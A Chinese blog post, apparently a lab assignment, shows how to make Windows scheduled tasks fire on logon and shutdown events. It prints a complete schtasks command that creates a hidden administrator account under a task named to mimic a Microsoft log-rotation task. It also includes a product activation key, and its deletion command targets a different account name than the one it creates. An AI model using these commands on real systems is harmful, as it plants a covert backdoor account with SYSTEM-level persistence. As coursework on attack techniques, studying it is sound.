网络攻防任务二：开机关机事件触发账户的创建与删除

Posted 2022-10-09 cyx-b

 

一、任务要求

设计一个以开机、关机事件为触发条件的计划任务，实现:

1、开机时新建一个用户

2、关机时删除用户

 

 

二、解决步骤

（一）实验环境搭建

事件触发的命令是schtasks。

利用schtasks完成的功能主要是：利用确定的日志事件触发net user命令，以达到新增一个管理员账户的目的。

如果利用传统的at命令，首先无法用日志事件触发，其次需要执行多条命令行时，只能将它们编写成.bat的批处理文件进行处理。

 

由于要用到事件触发，xp没有这个功能，所以要新建一个win7的虚拟机。

Win7激活秘钥为YKHFT KW986 GK4PY FDWYH 7TP9F

 

（二）开机创建用户

Schtasks的用法描述:

 

    允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划任

    务。

 

参数列表:

    /Create         创建新计划任务。

 

    /Delete         删除计划任务。

 

    /Query          显示所有计划任务。

 

    /Change         更改计划任务属性。

 

    /Run            按需运行计划任务。

 

    /End            中止当前正在运行的计划任务。

 

    /ShowSid        显示与计划的任务名称相应的安全标识符。

 

    /?              显示此帮助消息。

 

Examples:

    SCHTASKS

    SCHTASKS /?

    SCHTASKS /Run /?

    SCHTASKS /End /?

    SCHTASKS /Create /?

    SCHTASKS /Delete /?

    SCHTASKS /Query  /?

    SCHTASKS /Change /?

    SCHTASKS /ShowSid /?

 

开机事件的事件ID为4624，因此代码如下：

schtasks /create /tn "Microsoft\\Windows\\LocalEventLogRotate" /tr "\\"cmd.exe\\" /k net user cyx cyx /add /y /active:yes >> nul & net localgroup administrators cyx /add >nul & net user cyx /comment:\\"Built-in account for Backdooring your network suckers\\" > nul & exit" /f /ru system /ec Security /sc onevent /mo"*[System[Provider[@Name=‘Microsoft-Windows-Security-Auditing‘] and EventID=4624]]"

直接在命令行窗口下输入这行代码即可。

 

 

 

 

 

 

 

 

重启的时候有登录窗口，原因是关机的时候账户未删。

 

 

 

 

 

（三）关机删除用户

经查询关机事件ID为1074。

代码如下：

schtasks /create /tn "Microsoft\\Windows\\LocalEventLog" /tr "\\"cmd.exe\\" /k net user lemon /del > nul & exit" /f /ru system /sc onevent /ec System /mo "*[System[EventID=1074]]"

关机之前先检查一下账户情况

 

 

 

 

 

重启之后，结果如下图所示，账户已被删除。

 

 

 

 

开机后，再输入net user，可以看到账户在开机之后也建立成功了。